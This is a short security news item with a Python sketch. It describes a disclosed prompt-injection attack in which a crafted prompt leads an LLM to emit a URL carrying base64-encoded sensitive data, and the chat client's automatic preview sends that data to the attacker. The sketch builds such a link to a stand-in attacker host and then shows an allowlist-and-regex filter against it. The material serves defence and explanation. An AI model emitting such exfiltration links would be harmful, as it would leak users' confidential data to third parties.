Research · prompt injection · LLM · data exfiltration
URL Previews Expose Sensitive Data in LLMs
Relevance Score: 8.3
Security researchers at Prompt Armor disclosed a vulnerability in LLM-powered chat interfaces: automatic URL previews can exfiltrate encoded sensitive data with no user interaction. In their OpenClaw demonstration, an attacker-crafted prompt caused the model to emit a URL carrying base64-encoded case details; the chat client then fetched that URL automatically to render a preview, delivering the payload to the attacker's server. Enterprises connecting AI agents to internal data stores face elevated data-loss risk and should consider disabling automatic previews or proxying preview fetches.
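
To make the mechanism concrete, here is a minimal Python sketch of both halves of the problem. It is not Prompt Armor's code; the host names, the secret text, the 24-character regex threshold, and the helper names are all illustrative assumptions. The first half shows how a crafted link smuggles base64-encoded data in its query string; the second is a client-side gate that refuses to auto-preview URLs that are off an allowlist or that carry payload-shaped tokens.

```python
import base64
import re
from urllib.parse import urlparse

# Attack half: a prompt-injected model emits a link like this one, with the
# stolen text smuggled as a base64 token in the query string. Everything
# here (host name, secret text) is fabricated for illustration.
secret = "case 4421: client SSN 555-12-3456"
payload = base64.urlsafe_b64encode(secret.encode()).decode().rstrip("=")
crafted = f"https://attacker.example/log?d={payload}"

# Defense half: gate automatic previews. A long unbroken run of
# base64-alphabet characters in the path or query is the telltale shape
# of a smuggled payload; the 24-char threshold is an assumption to tune.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/_-]{24,}={0,2}")

def looks_like_exfil(url: str) -> bool:
    """Heuristic: does this URL carry a long base64-looking token?"""
    parsed = urlparse(url)
    return bool(BASE64_RUN.search(parsed.path) or BASE64_RUN.search(parsed.query))

def should_render_preview(url: str, allowed_hosts: set[str]) -> bool:
    """Auto-preview only allowlisted hosts, and never payload-shaped URLs."""
    host = urlparse(url).netloc.lower()
    return host in allowed_hosts and not looks_like_exfil(url)

if __name__ == "__main__":
    allowed = {"docs.example.com"}
    print(should_render_preview("https://docs.example.com/guides/setup", allowed))  # True
    print(should_render_preview(crafted, allowed))  # False: unknown host, payload-shaped
```

A proxying deployment would go further than this heuristic: routing every preview fetch through an egress proxy that enforces the allowlist means a missed payload still never reaches an attacker-controlled host directly.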


